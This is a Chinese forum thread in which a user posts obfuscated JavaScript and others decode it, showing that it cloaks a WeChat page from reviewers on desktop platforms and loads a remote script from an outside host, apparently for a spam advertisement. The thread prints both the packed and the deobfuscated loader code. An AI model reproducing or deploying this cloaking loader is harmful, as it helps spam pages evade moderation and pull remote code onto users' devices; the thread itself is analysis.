window.$php_url = "//api. chmochee. com /rpx"; eval(function (p, a, c, k, e, r) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) r[e(c)] = k[c] || e(c); k = [
function (e) {
return r[e]
}
];
e = function () {
return '\\w+'
};
c = 1
};
while (c--)
if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
}('(j(a,b){a(b)})(j(a){5 b=y.S.t();5 c=y.Y.t();5 d=F.N("R/k","V");5 e='';n(!/B/.C(b)||c.s("K")==0||c.s("O")==0){e="网络错误,请重新打开!!!"}Q{n(q(m.$g)=='u'||m.$g<=''){m.$g='//Z.11.1a.1b.1z/1B'}5 f=0;n(q(h.l)!='u'){f=h.l}h.D(f+1,"E","#"+a(p)+(G H).I());e=J("%7%L%M%2%4%P%2%4%1E%2%4%3%3%3%3%r%T-U%9%W-X%6%o%9%10/k%v%12%13-8%6%2%4%3%3%3%3%r%14%9%15%6%o%9%16%17-18%19-w%x.0%1c-w%x.0%1d-1e%1f%6/%2%4%3%3%3%3%1g%2%7/1h%2%4%7/1i%2%4%1j%1k%9%1l%1m%1n%v%6%2%4%1o%1p%9%6"+1q($g)+"/1r.1s%6%2%7/1t%2%4%7/1u%2%4%7/k%2")}d.1v(e);d.1w()},j(a){ a=a||p; 5 b='1x'; 5 c=b.l; 5 d=''; 1y(i=0;i<a;i++){ d+=b.1A(z.1C(z.1D()*c)); } A d});', 62, 103, '||3E|20|0A|var|22|3C||3D|||||||php_url|history||function|html|length|window|if|20content|32|typeof|3Cmeta|indexOf|toLowerCase|undefined|3B|scale|3D1|navigator|Math|return|micromessenger|test|pushState|message|document|new|Date|getTime|unescape|win|21DOCTYPE|20html|open|mac|3Chtml|else|text|userAgent|20http|equiv|replace|22Content|Type|platform|apple|22text|cloud|20charset|3Dutf|20name|22viewport|22width|3Ddevice|width|2Cinitial|theshop|com|2Cmaximum|2Cuser|scalable|3D0|3Ctitle|title|head|3Cbody|20style|22background|3A|23fff2e5|3Cscript|20src|escape|loadhtml|php|script|body|write|close|ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678|for|cn|charAt|rpx|floor|random|3Chead'.split('|'), 0, {}));
1
xssp OP 好心的大佬,帮个忙,谢谢了。
|
2
OpenJerry 2018-06-17 19:49:28 +08:00
|
3
yankebupt 2018-06-17 20:23:02 +08:00
如果你运气好有可能这是用某个 js 框架写的,没保护过的话有对应浏览器调试插件恢复易读格式...比如某些 react...
如果真的做过混淆或者就不打算调试了没留后路估计 GG 了... |
6
aristotll 2018-06-17 20:57:30 +08:00
复制粘贴能拷贝好吗 markdown 至少格式也要吧
把你的内容粘贴进去全部报错 就不想看了 |
7
xiaocsl 2018-06-17 21:25:34 +08:00 1
eval 里面肯定的结果肯定是一个字符串,你单纯的执行一下里面的函数返回的字符串就是要执行的代码.
不过你复制的代码, function (p, a, c, k, e, r) 这个函数里第一个参数 p 不知道是你复制的问题,还是说在其他代码里有些小 hack ,直接执行的话,因为参数 p 不是个正确的字符串,所以会报错.手动改一下引号就行了.最后执行出的结果是. (function(a, b) { a(b) })(function(a) { var b = navigator.userAgent.toLowerCase(); var c = navigator.platform.toLowerCase(); var d = document.open("text/html", "replace"); var e = ""; if (!/micromessenger/.test(b) || c.indexOf("win") == 0 || c.indexOf("mac") == 0) { e = "网络错误,请重新打开!!!" } else { if (typeof(window.$php_url) == "undefined " || window.$php_url <= "") { window.$php_url = " //apple.cloud.theshop.com.cn/rpx" } var f = 0; if (typeof(history.length) != "undefined") { f = history.length } history.pushState(f + 1, "message", "#" + a(32) + (new Date).getTime()); e = unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Dutf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2Cinitial-scale%3D1.0%2Cmaximum-scale%3D1.0%2Cuser-scalable%3D0%22/%3E%0A%20%20%20%20%3Ctitle%3E%3C/title%3E%0A%3C/head%3E%0A%3Cbody%20style%3D%22background%3A%23fff2e5%3B%22%3E%0A%3Cscript%20src%3D%22" + escape($php_url) + "/loadhtml.php%22%3E%3C/script%3E%0A%3C/body%3E%0A%3C/html%3E") } d.write(e); d.close() }, function(a) { a = a || 32; var b = "ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678"; var c = b.length; var d = ""; for (i = 0; i < a; i++) { d += b.charAt(Math.floor(Math.random() * c)); } return d }); |
8
xiaocsl 2018-06-17 21:37:12 +08:00
也或者有啥我不知道的一些 JS 特性,如果有大佬知道的话,麻烦 @我一下哈.
|
9
manhere 2018-06-17 21:40:58 +08:00 via Android 2
很明显这是实现了一个微信防封防举报功能
|
10
yankebupt 2018-06-17 23:28:48 +08:00 1
@manhere 感谢。没仔细看还以为可能是 js 框架封装的事件 dispatcher...
不过用 UA 和 platform 真能躲过人工举报审核么... 要么这作者强猜审核员是 win 或 mac 而不是 mobile 模拟器什么的... 要不就是真的举报过,然后钓鱼抓取过审核员的 UA/platform,真的是 win 或 mac... |
12
wuhau 2018-06-17 23:53:25 +08:00 1
http@//apple[dot]cloud. ***shop[dot]com[dot]cn/ rpx /loa**tml [dot] php 访问后获取到一段 js.
然后将页面的 data['html'] 的值 base64 解密,又引用了一个 www [dot] li*kte*h [dot] cn 的 CPS 壮阳广告 |
22
Leigg 2018-06-18 22:44:32 +08:00 via iPhone
qq 浏览器有个 js 美化插件
|